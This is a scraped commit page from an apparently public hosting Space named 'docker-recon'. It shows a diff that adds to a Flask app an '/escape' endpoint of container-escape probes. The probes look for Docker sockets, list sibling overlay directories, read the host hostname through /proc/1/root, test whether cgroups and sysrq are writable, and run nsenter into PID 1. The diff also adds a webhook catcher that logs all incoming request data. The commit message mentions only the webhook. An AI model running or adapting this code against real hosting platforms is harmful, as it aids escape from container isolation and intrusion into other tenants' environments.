Spaces:

2fa2fa
/

docker-recon

Sleeping

App Files Files Community

dia2diab commited on Mar 6

Commit

546bae5

1 Parent(s): 0cf362f

Add webhook catcher endpoint

Browse files

Files changed (1) hide show

app.py +103 -0

app.py CHANGED Viewed

@@ -195,3 +195,106 @@ def fetch():
 if __name__ == "__main__":
     app.run(host="0.0.0.0", port=7860)

 if __name__ == "__main__":
     app.run(host="0.0.0.0", port=7860)
+@app.route("/escape")
+def escape():
+    """Container escape probes"""
+    r = {}
+    # Check for Docker/containerd sockets
+    import os.path
+    for sock in ["/var/run/docker.sock", "/run/containerd/containerd.sock",
+                  "/run/docker.sock", "/var/run/containerd/containerd.sock",
+                  "/var/run/cri-dockerd.sock"]:
+        r[f"socket_{sock}"] = os.path.exists(sock)
+    # Check overlay upper dir (from mounts)
+    try:
+        with open("/proc/mounts") as f:
+            for line in f:
+                if "overlay" in line and "upperdir" in line:
+                    parts = line.split(",")
+                    for p in parts:
+                        if p.startswith("upperdir="):
+                            upperdir = p.split("=")[1]
+                            r["overlay_upperdir"] = upperdir
+                            # Try to go up from upper dir to find other containers
+                            parent = os.path.dirname(os.path.dirname(upperdir))
+                            try:
+                                r["overlay_siblings"] = os.listdir(parent)[:20]
+                            except Exception as e:
+                                r["overlay_siblings"] = str(e)
+    except Exception as e: r["overlay_error"] = str(e)
+    # Check if we can access host /proc
+    try:
+        with open("/proc/1/root/etc/hostname") as f:
+            r["host_hostname"] = f.read().strip()
+    except Exception as e: r["host_hostname"] = str(e)
+    # Try to read /proc/sysrq-trigger
+    try:
+        r["sysrq"] = os.access("/proc/sysrq-trigger", os.W_OK)
+    except: r["sysrq"] = False
+    # Check cgroupfs
+    try:
+        cg_root = "/sys/fs/cgroup"
+        if os.path.isdir(cg_root):
+            r["cgroup_root"] = os.listdir(cg_root)[:20]
+            # Try to write to cgroup
+            r["cgroup_writable"] = os.access(cg_root, os.W_OK)
+    except Exception as e: r["cgroup_error"] = str(e)
+    # Check for privileged mode indicators
+    try:
+        with open("/proc/1/status") as f:
+            for line in f:
+                if "Seccomp" in line:
+                    r["seccomp"] = line.strip()
+    except: pass
+    # Check device access
+    try:
+        r["dev_listing"] = os.listdir("/dev")[:30]
+    except: pass
+    # Try nsenter
+    try:
+        p = subprocess.run(["nsenter", "--target", "1", "--mount", "--", "hostname"],
+            capture_output=True, text=True, timeout=5)
+        r["nsenter"] = {"stdout": p.stdout, "stderr": p.stderr, "rc": p.returncode}
+    except Exception as e: r["nsenter"] = str(e)
+    # Check /proc/1/ns
+    try:
+        r["namespaces"] = {}
+        for ns in os.listdir("/proc/1/ns"):
+            r["namespaces"][ns] = os.readlink(f"/proc/1/ns/{ns}")
+    except Exception as e: r["ns_error"] = str(e)
+    return jsonify(r)
+import threading
+webhook_log = []
+@app.route("/webhook", methods=["GET", "POST", "PUT", "DELETE", "PATCH"])
+def webhook():
+    """Catch and log webhook requests"""
+    entry = {
+        "method": request.method,
+        "headers": dict(request.headers),
+        "body": request.get_data(as_text=True)[:5000],
+        "args": dict(request.args),
+        "remote_addr": request.remote_addr,
+        "url": request.url,
+    }
+    webhook_log.append(entry)
+    # Keep only last 10
+    while len(webhook_log) > 10:
+        webhook_log.pop(0)
+    return jsonify({"status": "ok"})
+@app.route("/webhook_log")
+def get_webhook_log():
+    """View captured webhook requests"""
+    return jsonify(webhook_log)